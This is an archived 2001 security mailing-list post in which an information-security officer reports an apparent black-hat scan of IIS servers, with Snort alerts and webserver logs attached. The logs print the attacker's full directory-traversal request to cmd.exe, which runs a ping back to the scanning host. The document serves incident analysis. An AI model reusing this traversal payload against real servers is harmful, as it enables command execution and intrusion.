I don't think this is a worm. I think this is most probably a black-hat scanning technique. Note the command the scanner attempted to execute. A single ping-back to the scanning machine. This would allow the scanner to easily generate a list of vulnerable boxen. Attached are intrusion detection system and webserver logs in EST. Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80 Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2828 -> Pub.IP.Address:80 Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2927 -> Pub.IP.Address:80 Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80 Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80 Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80 2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 - 2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 - Keith T. Morgan Chief of Information Security Terradon Communications keith.morganat_private 304-755-8291 x142 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 09:22:01 PDT